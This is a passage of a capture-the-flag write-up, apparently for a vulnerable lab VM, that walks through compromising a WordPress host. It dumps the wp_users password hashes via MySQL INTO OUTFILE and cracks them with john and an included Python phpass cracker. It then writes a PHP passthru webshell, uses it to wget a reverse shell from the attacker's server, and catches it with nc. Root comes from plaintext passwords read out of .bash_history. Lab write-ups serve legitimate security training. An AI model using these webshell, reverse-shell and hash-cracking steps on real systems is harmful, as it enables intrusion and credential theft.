| 11 | ZOE        | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 | zoe           | zoe@red.localhost     |                  | 2016-06-05 16:19:50 |                     |           0 | ZOE             |
| 12 | Dave       | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. | dave          | dave@red.localhost    |                  | 2016-06-05 16:20:09 |                     |           0 | Dave            |
| 13 | Simon      | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 | simon         | simon@red.localhost   |                  | 2016-06-05 16:20:35 |                     |           0 | Simon           |
| 14 | Abby       | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. | abby          | abby@red.localhost    |                  | 2016-06-05 16:20:53 |                     |           0 | Abby            |
| 15 | Vicki      | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 | vicki         | vicki@red.localhost   |                  | 2016-06-05 16:21:14 |                     |           0 | Vicki           |
| 16 | Pam        | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 | pam           | pam@red.localhost     |                  | 2016-06-05 16:42:23 |                     |           0 | Pam             |
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
16 rows in set (0.001 sec)

The WordPress password hashes are exposed, so dump them in a format a cracker can take. (SELECT ... INTO OUTFILE needs the FILE privilege, a secure_file_priv setting that does not restrict the path, and a directory the mysqld user can write to; writing under the web root means the dump is then fetchable over HTTP.)

MySQL [wordpress]> select concat_ws(':', user_login, user_pass) from wp_users into outfile '/var/www/https/blogblog/wp-content/uploads/passwd.txt';
Query OK, 16 rows affected (0.010 sec)
# curl -k https://10.10.10.14:12380/blogblog/wp-content/uploads/passwd.txt
John:$P$B7889EMq/erHIuZapMB8GEizebcIy9.
Elly:$P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0
Peter:$P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0
barry:$P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0
heather:$P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10
garry:$P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1
harry:$P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0
scott:$P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1
kathy:$P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0
tim:$P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0
ZOE:$P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1
Dave:$P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy.
Simon:$P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0
Abby:$P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs.
Vicki:$P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131
Pam:$P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0

I dumped all of them, but judging by the ID (1) John looks like the admin, so John's password is the only one I really need.

# curl -k https://10.10.10.14:12380/blogblog/wp-content/uploads/passwd.txt | grep John > pass
# john --wordlist=/usr/share/wordlists/rockyou.txt pass
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
incorrect        (John)
1g 0:00:00:12 DONE (2020-05-12 06:04) 0.07961g/s 14721p/s 14721c/s 14721C/s ipod22..iloveafi
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed
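To see what john is actually doing with these $P$ hashes, here is a small phpass reimplementation, added as an example (not code from the page, from WordPress or from John the Ripper). It recomputes a hash from the 12-character setting prefix (the letter after $P$ encodes log2 of the iteration count, 'B' giving the 8192 that john reported), verifies John's hash from the dump above, runs a tiny dictionary attack, and parses the user:hash lines produced by the INTO OUTFILE query. Only the hash is from the page; the candidate wordlist is constructed.

```python
"""Verify and crack WordPress (phpass 'portable', $P$/$H$) hashes offline.

Added example, not code from the page, WordPress or John the Ripper.
The hash checked in __main__ is the one dumped from wp_users above;
the candidate wordlist is constructed."""
import hashlib
from typing import Dict, Iterable, Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes, count: int) -> str:
    """phpass's own base64 variant: itoa64 alphabet, no padding, 16 bytes -> 22 chars."""
    out = []
    i = 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_hash(password: str, setting: str) -> str:
    """Recompute a $P$ hash from its 12-char setting prefix.

    setting[3] is log2(iterations) in the itoa64 alphabet ('B' -> 2**13 = 8192,
    the 'Cost 1' john printed above); setting[4:12] is the 8-char salt.
    The digest is md5(salt+pw) followed by `iterations` rounds of md5(h+pw)."""
    if setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("bad iteration count")
    salt = setting[4:12].encode()
    pw = password.encode()
    h = hashlib.md5(salt + pw).digest()
    for _ in range(1 << count_log2):
        h = hashlib.md5(h + pw).digest()
    return setting[:12] + _encode64(h, 16)


def phpass_verify(password: str, stored: str) -> bool:
    """True if `password` reproduces the stored hash (constant-time not needed offline)."""
    return phpass_hash(password, stored) == stored


def crack(stored: str, candidates: Iterable[str]) -> Optional[str]:
    """Dictionary attack: first candidate that verifies, or None."""
    for pw in candidates:
        if phpass_verify(pw, stored):
            return pw
    return None


def parse_dump(text: str) -> Dict[str, str]:
    """Parse the user:hash lines written by the INTO OUTFILE query above."""
    users: Dict[str, str] = {}
    for line in text.splitlines():
        if ":" in line:
            user, h = line.split(":", 1)
            users[user.strip()] = h.strip()
    return users


if __name__ == "__main__":
    john_hash = "$P$B7889EMq/erHIuZapMB8GEizebcIy9."         # from wp_users above
    wordlist = ["password", "123456", "incorrect", "letmein"]  # constructed
    print("John ->", crack(john_hash, wordlist))
```

At 8192 MD5 rounds per guess pure Python manages only a few hundred guesses per second, which is why rockyou-scale lists belong in john or hashcat; the value of this version is being able to confirm a crack result, or check a handful of reused passwords against the other 15 hashes, without any tooling.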

That got me an admin login on WordPress, so as usual I'd overwrite whatever I like under Appearance -> Editor.
This time the target is "404.php".
Replace "404.php" wholesale with "/usr/share/webshells/php/php-reverse-shell.php".

# cp /usr/share/webshells/php/php-reverse-shell.php reverse.php
# vim reverse.php 

...or so I thought, but this WordPress apparently doesn't allow editing themes.
Why? (WordPress refuses theme edits when DISALLOW_FILE_EDIT or DISALLOW_FILE_MODS is set in wp-config.php, or when the theme files are not writable by the web-server user; the wp-config.php dumped above sets neither, which makes file permissions the likelier explanation.)
Switching plans: plant a webshell via MySQL instead.
Plant the webshell with the same INTO OUTFILE trick, this time writing PHP into the uploads directory.

# mysql -h 10.10.10.14 -u root -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 1013
Server version: 5.7.12-0ubuntu1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> select "<?php passthru($_GET['cmd']); ?>" into outfile '/var/www/https/blogblog/wp-content/uploads/shell.php';
Query OK, 1 row affected (0.001 sec)

Download the reverse shell onto the target through the webshell.

window 1

# python -m SimpleHTTPServer 80
window 2

# curl -k https://10.10.10.14:12380/blogblog/wp-content/uploads/shell.php?cmd=wget+10.10.10.3/reverse.php
window 1

# nc -nlvp 8080

window 2

curl -k https://10.10.10.14:12380/blogblog/wp-content/uploads/reverse.php




window 1

Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
 20:37:56 up 7:59, 0 users, load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@red:/$

shell getchu!


Another way to check which WordPress plugins are installed (works because directory listing is enabled):

curl https://10.10.10.14:12380/blogblog/wp-content/plugins/ -k -s | html2text


## after shell getchu
I looked at cron.<br>
I tried kernel exploits.<br>
Nothing landed; I was completely stuck.<br>
Finally, this:

www-data@red:/home$ cat */.bash_history
cat */.bash_history
exit
free
exit
exit
exit
exit
exit
exit
exit
exit
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
exit
exit
exit
exit
whoami
exit
exit
exit
exit
exit
exit
exit
exit
exit
id
exit
top
ps aux
exit
exit
exit
exit
cat: peter/.bash_history: Permission denied
top
exit

".bash_history", huh. Plaintext passwords passed on the sshpass command line end up in shell history, readable by anyone who can read the file.<br>
JKanode didn't have sudo rights, but peter did.

ssh peter@10.10.10.14

(snip)
red% sudo -l

We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

[sudo] password for peter:
Matching Defaults entries for peter on red:
    lecture=always, env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User peter may run the following commands on red:
    (ALL : ALL) ALL
red% sudo su
➜  peter ls
➜  peter id
uid=0(root) gid=0(root) groups=0(root)
➜  peter cd /root
➜  ~ ls
fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql
➜  ~ cat flag.txt
<(Congratulations)>
(ASCII-art banner)
b6b545dc11b7a270f4bad23432190c75162c4a2b

➜ ~ exit


## Wrap-up
 - I think I got a light taste of a rabbit hole (still pretty naive, maybe)
 - Maybe the WordPress theme tampering I've been relying on up to now isn't actually possible that often?